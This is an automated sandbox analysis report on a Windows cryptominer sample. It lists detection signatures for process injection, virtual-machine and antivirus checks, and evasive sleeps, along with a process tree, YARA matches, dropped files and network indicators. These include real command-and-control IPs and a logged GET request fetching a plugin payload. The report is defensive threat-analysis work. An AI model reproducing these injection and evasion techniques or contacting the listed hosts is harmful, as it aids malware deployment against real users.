Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report frF39bBsa7.exe

Overview

General Information

Sample Name:frF39bBsa7.exe
Analysis ID:499492
MD5:f6a627b01b8ac665add87b047e732613
SHA1:b50d28f58d0892708db4ca09658547fba013f73d
SHA256:bbabc0cb29dc697735ab4b2d4285e9bb608f992393b734b7b20d4a4ba42a75ce
Tags:exe
Infos:

Most interesting Screenshot:

Detection

IPack Miner
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected IPack Miner
Writes to foreign memory regions
Connects to many ports of the same IP (likely port scanning)
Yara detected Costura Assembly Loader
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • frF39bBsa7.exe (PID: 4752 cmdline: 'C:\Users\user\Desktop\frF39bBsa7.exe' MD5: F6A627B01B8AC665ADD87B047E732613)
    • aspnet_compiler.exe (PID: 1244 cmdline: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)
  • winda.exe (PID: 6604 cmdline: 'C:\Users\user\AppData\Roaming\winda.exe' MD5: F6A627B01B8AC665ADD87B047E732613)
    • aspnet_compiler.exe (PID: 5900 cmdline: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)
  • winda.exe (PID: 6788 cmdline: 'C:\Users\user\AppData\Roaming\winda.exe' MD5: F6A627B01B8AC665ADD87B047E732613)
    • aspnet_compiler.exe (PID: 2808 cmdline: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmpJoeSecurity_IPackMinerYara detected IPack MinerJoe Security
      00000014.00000002.529532674.000001E81BC9F000.00000004.00000001.sdmpJoeSecurity_IPackMinerYara detected IPack MinerJoe Security
        00000014.00000002.529491843.000001E81BC88000.00000004.00000001.sdmpJoeSecurity_IPackMinerYara detected IPack MinerJoe Security
          00000012.00000002.505864982.000001453AD50000.00000004.00020000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.aspnet_compiler.exe.1453ad50000.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              18.2.aspnet_compiler.exe.1453ae9fc78.9.raw.unpackJoeSecurity_IPackMinerYara detected IPack MinerJoe Security
                18.2.aspnet_compiler.exe.1453ada0000.4.unpackJoeSecurity_IPackMinerYara detected IPack MinerJoe Security
                  18.2.aspnet_compiler.exe.1453ae84cb0.7.unpackJoeSecurity_IPackMinerYara detected IPack MinerJoe Security
                    20.2.aspnet_compiler.exe.1e81bb90000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 45 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: frF39bBsa7.exeVirustotal: Detection: 22%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: frF39bBsa7.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\winda.exeJoe Sandbox ML: detected

                      Bitcoin Miner:

                      barindex
                      Yara detected IPack MinerShow sources
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae9fc78.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ada0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae84cb0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bce72a8.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae7aa28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454afda140.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc74cb0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ac60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81baa0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc8fc78.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc8b060.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454afda140.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81baa0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.aspnet_compiler.exe.24752700000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae84cb0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae9b060.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc8fc78.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc6aa28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae9b060.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.aspnet_compiler.exe.24752510000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ada0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bdca140.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc74cb0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ac60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae9fc78.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bb40000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc6aa28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ae7aa28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bdca140.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.aspnet_compiler.exe.24752510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.aspnet_compiler.exe.24752700000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bc8b060.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bb40000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454aef72a8.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529532674.000001E81BC9F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529491843.000001E81BC88000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506433736.000001453AEC5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.505987468.000001453ADA0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.559151379.0000024752700000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506304338.000001453AE82000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529127824.000001E81BB40000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506328241.000001453AE98000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.530094899.000001E82BDCA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.558664715.0000024752600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.528940589.000001E81BAA0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.558195280.0000024752510000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.505581498.000001453AC60000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529469725.000001E81BC72000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.507008971.000001454AEF7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506389041.000001453AEAF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529584589.000001E81BCB5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.530489015.000001E8342F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.508932929.0000014553500000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529979223.000001E82BCE7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.507488204.000001454AFDA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 2808, type: MEMORYSTR
                      Source: frF39bBsa7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: 28c21ad7-5072-47e8-89f2-38d62f1859ec<Module>costura.classlibrary1.dll.compressedcostura.classlibrary1.pdb.compressedcostura.costura.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.protobuf-net.dll.compressedFyzzzkou.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: aspnet_compiler.exe, 00000012.00000002.506737600.000001454AE51000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.530094899.000001E82BDCA000.00000004.00000001.sdmp
                      Source: Binary string: costura.classlibrary1.pdb.compressed source: aspnet_compiler.exe, 00000007.00000002.559538947.00000247527C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256 source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506433736.000001453AEC5000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529843907.000001E82BC41000.00000004.00000001.sdmp
                      Source: Binary string: $costura.classlibrary1.pdb.compressed source: aspnet_compiler.exe, 00000007.00000002.559538947.00000247527C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506433736.000001453AEC5000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529843907.000001E82BC41000.00000004.00000001.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256 source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe.0.dr
                      Source: Binary string: protobuf-net.pdb source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\Windows10\Desktop\LicencingSystem2\PureMiner_Shared\obj\Debug\ClassLibrary1.pdb source: aspnet_compiler.exe, 00000007.00000002.559151379.0000024752700000.00000004.00020000.sdmp, aspnet_compiler.exe, 00000012.00000002.505987468.000001453ADA0000.00000004.00020000.sdmp, aspnet_compiler.exe, 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Connects to many ports of the same IP (likely port scanning)Show sources
                      Source: global trafficTCP traffic: 82.102.27.195 ports 46017,0,1,4,6,7
                      Source: global trafficHTTP traffic detected: GET /Plugin_1 HTTP/1.1Host: 185.215.113.77Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 185.215.113.77 185.215.113.77
                      Source: Joe Sandbox ViewIP Address: 185.215.113.77 185.215.113.77
                      Source: global trafficTCP traffic: 192.168.2.3:49825 -> 82.102.27.195:46017
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.102.27.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.77
                      Source: aspnet_compiler.exe, 00000007.00000002.560130182.00000247528D5000.00000004.00000001.sdmpString found in binary or memory: http://185.215.113.77
                      Source: aspnet_compiler.exe, 00000007.00000002.560113695.00000247528D3000.00000004.00000001.sdmpString found in binary or memory: http://185.215.113.77/Plugin_1
                      Source: aspnet_compiler.exe, 00000007.00000002.560113695.00000247528D3000.00000004.00000001.sdmpString found in binary or memory: http://185.215.113.77/Plugin_1(
                      Source: aspnet_compiler.exe, 00000007.00000002.558916974.0000024752661000.00000004.00000001.sdmpString found in binary or memory: http://185.215.113.77/Plugin_1LH
                      Source: aspnet_compiler.exe, 00000007.00000002.560018939.00000247528B5000.00000004.00000001.sdmpString found in binary or memory: http://185.215.113.77/Plugin_1nUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu
                      Source: aspnet_compiler.exe, 00000007.00000002.560130182.00000247528D5000.00000004.00000001.sdmpString found in binary or memory: http://185.215.113.77x
                      Source: aspnet_compiler.exe, 00000007.00000002.560130182.00000247528D5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: aspnet_compiler.exe, 00000007.00000002.560262930.000002475291D000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: global trafficHTTP traffic detected: GET /Plugin_1 HTTP/1.1Host: 185.215.113.77Connection: Keep-Alive
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 18_2_00007FFC08820FB018_2_00007FFC08820FB0
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 18_2_00007FFC08820F8318_2_00007FFC08820F83
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 18_2_00007FFC0882118318_2_00007FFC08821183
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 20_2_00007FFC08820FB020_2_00007FFC08820FB0
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 20_2_00007FFC08820F8320_2_00007FFC08820F83
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeCode function: 0_2_00007FFC0882B3EC NtUnmapViewOfSection,0_2_00007FFC0882B3EC
                      Source: C:\Users\user\AppData\Roaming\winda.exeCode function: 9_2_00007FFC0883B3EC NtUnmapViewOfSection,9_2_00007FFC0883B3EC
                      Source: C:\Users\user\AppData\Roaming\winda.exeCode function: 12_2_00007FFC0884B3EC NtUnmapViewOfSection,12_2_00007FFC0884B3EC
                      Source: aspnet_compiler.exe.0.drStatic PE information: No import functions for PE file found
                      Source: winda.exe.0.drStatic PE information: No import functions for PE file found
                      Source: frF39bBsa7.exeStatic PE information: No import functions for PE file found
                      Source: frF39bBsa7.exeBinary or memory string: OriginalFilename vs frF39bBsa7.exe
                      Source: frF39bBsa7.exe, 00000000.00000002.348526372.0000000000FB9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs frF39bBsa7.exe
                      Source: frF39bBsa7.exe, 00000000.00000002.349768689.000000000367A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVflbsokac.exe" vs frF39bBsa7.exe
                      Source: frF39bBsa7.exeBinary or memory string: OriginalFilenamepm.exej% vs frF39bBsa7.exe
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe 7A2C15CE0E8593A1645C4E4F17873D953A2FFBD10AC048F8E0AA5B616381BF6D
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\winda.exe BBABC0CB29DC697735AB4B2D4285E9BB608F992393B734B7B20D4A4BA42A75CE
                      Source: frF39bBsa7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: winda.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: frF39bBsa7.exeVirustotal: Detection: 22%
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeFile read: C:\Users\user\Desktop\frF39bBsa7.exeJump to behavior
                      Source: frF39bBsa7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\frF39bBsa7.exe 'C:\Users\user\Desktop\frF39bBsa7.exe'
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\winda.exe 'C:\Users\user\AppData\Roaming\winda.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\winda.exe 'C:\Users\user\AppData\Roaming\winda.exe'
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeFile created: C:\Users\user\AppData\Roaming\winda.exeJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeFile created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.mine.winEXE@9/6@0/2
                      Source: frF39bBsa7.exe, Trladspyohcpiwsrxymipz.Candidates/PrinterConfigurationCandidate.csTask registration methods: 'RegisterTask'
                      Source: winda.exe.0.dr, Trladspyohcpiwsrxymipz.Candidates/PrinterConfigurationCandidate.csTask registration methods: 'RegisterTask'
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\969E16358F1BD3B0AE052848B917C847
                      Source: frF39bBsa7.exe, Trladspyohcpiwsrxymipz.Candidates/PrinterConfigurationCandidate.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: winda.exe.0.dr, Trladspyohcpiwsrxymipz.Candidates/PrinterConfigurationCandidate.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: frF39bBsa7.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: frF39bBsa7.exeStatic file information: File size 1271296 > 1048576
                      Source: frF39bBsa7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: frF39bBsa7.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x133e00
                      Source: frF39bBsa7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
